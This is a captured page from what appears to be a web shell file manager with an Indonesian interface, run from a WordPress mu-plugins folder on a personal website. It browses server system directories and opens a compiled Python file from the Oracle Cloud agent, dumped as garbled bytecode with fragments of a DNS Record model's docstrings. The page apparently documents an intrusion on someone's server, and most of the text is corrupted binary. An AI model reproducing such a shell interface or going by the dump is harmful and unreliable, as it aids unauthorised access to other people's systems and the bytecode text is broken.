📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
dns
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/dns/models
💾
Free:
45.8 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: record.pyc
a N��f� � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s� e Zd ZdZdd� Zedd� �Zejdd� �Zedd� �Zejd d� �Zed d� �Z e jdd� �Z ed d� �Z e jdd� �Z edd� �Zejdd� �Zedd� �Zejdd� �Zedd� �Z e jdd� �Z dd� Zdd� Zdd� ZdS ) �Recordz� A DNS resource record. For more information, see `Supported DNS Resource Record Types`__. __ https://docs.cloud.oracle.com/iaas/Content/DNS/Reference/supporteddnsresource.htm c K sZ dddddddd�| _ ddddd d dd�| _d| _d| _d| _d| _d| _d| _d| _dS ) a9 Initializes a new Record object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param domain: The value to assign to the domain property of this Record. :type domain: str :param record_hash: The value to assign to the record_hash property of this Record. :type record_hash: str :param is_protected: The value to assign to the is_protected property of this Record. :type is_protected: bool :param rdata: The value to assign to the rdata property of this Record. :type rdata: str :param rrset_version: The value to assign to the rrset_version property of this Record. :type rrset_version: str :param rtype: The value to assign to the rtype property of this Record. :type rtype: str :param ttl: The value to assign to the ttl property of this Record. :type ttl: int �str�bool�int)�domain�record_hash�is_protected�rdata� rrset_version�rtype�ttlr � recordHash�isProtectedr �rrsetVersionr r N) � swagger_types� attribute_map�_domain�_record_hash� _is_protected�_rdata�_rrset_version�_rtype�_ttl)�self�kwargs� r �y/sparta/input/_build_configuration/image_build+validate/lib/bmcenv/lib64/python3.9/site-packages/oci/dns/models/record.py�__init__ s. #�� zRecord.__init__c C s | j S )z� Gets the domain of this Record. The fully qualified domain name where the record can be located. :return: The domain of this Record. :rtype: str �r �r r r r r Q s z Record.domainc C s || _ dS )z� Sets the domain of this Record. The fully qualified domain name where the record can be located. :param domain: The domain of this Record. :type: str Nr"